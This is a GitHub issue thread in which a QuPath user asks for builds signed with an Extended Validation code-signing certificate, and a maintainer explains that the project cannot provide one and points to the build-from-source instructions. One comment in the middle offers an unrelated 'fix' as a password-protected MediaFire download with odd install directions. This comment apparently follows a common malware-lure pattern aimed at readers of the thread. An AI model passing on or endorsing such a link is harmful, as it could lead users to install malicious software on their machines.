### ISSUE TITLE
Extended Validation Code Signing Certificate

### ISSUE THREAD

**Issue by ojdeboer** [qupath/qupath#1605]
We have recently encountered issues installing QuPath on our computers at our academic hospital. According to our IT department, who investigated the matter, the problem is due to QuPath lacking an 'Extended Validation Code Signing Certificate'. Would it be possible to include this certificate in future builds so that we can continue using the software?

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by petebankhead** [comment]
I'm afraid that, as an open-source project, we don't have the time or resources to provide code signing certificates at this time. We'd potentially need certificates for all operating systems, and it's not something we can work on right now.

We provide full instructions to build QuPath from the source code, so if it helps your IT department could build a version themselves, rather than relying on the downloads here: https://qupath.readthedocs.io/en/stable/docs/reference/building.html
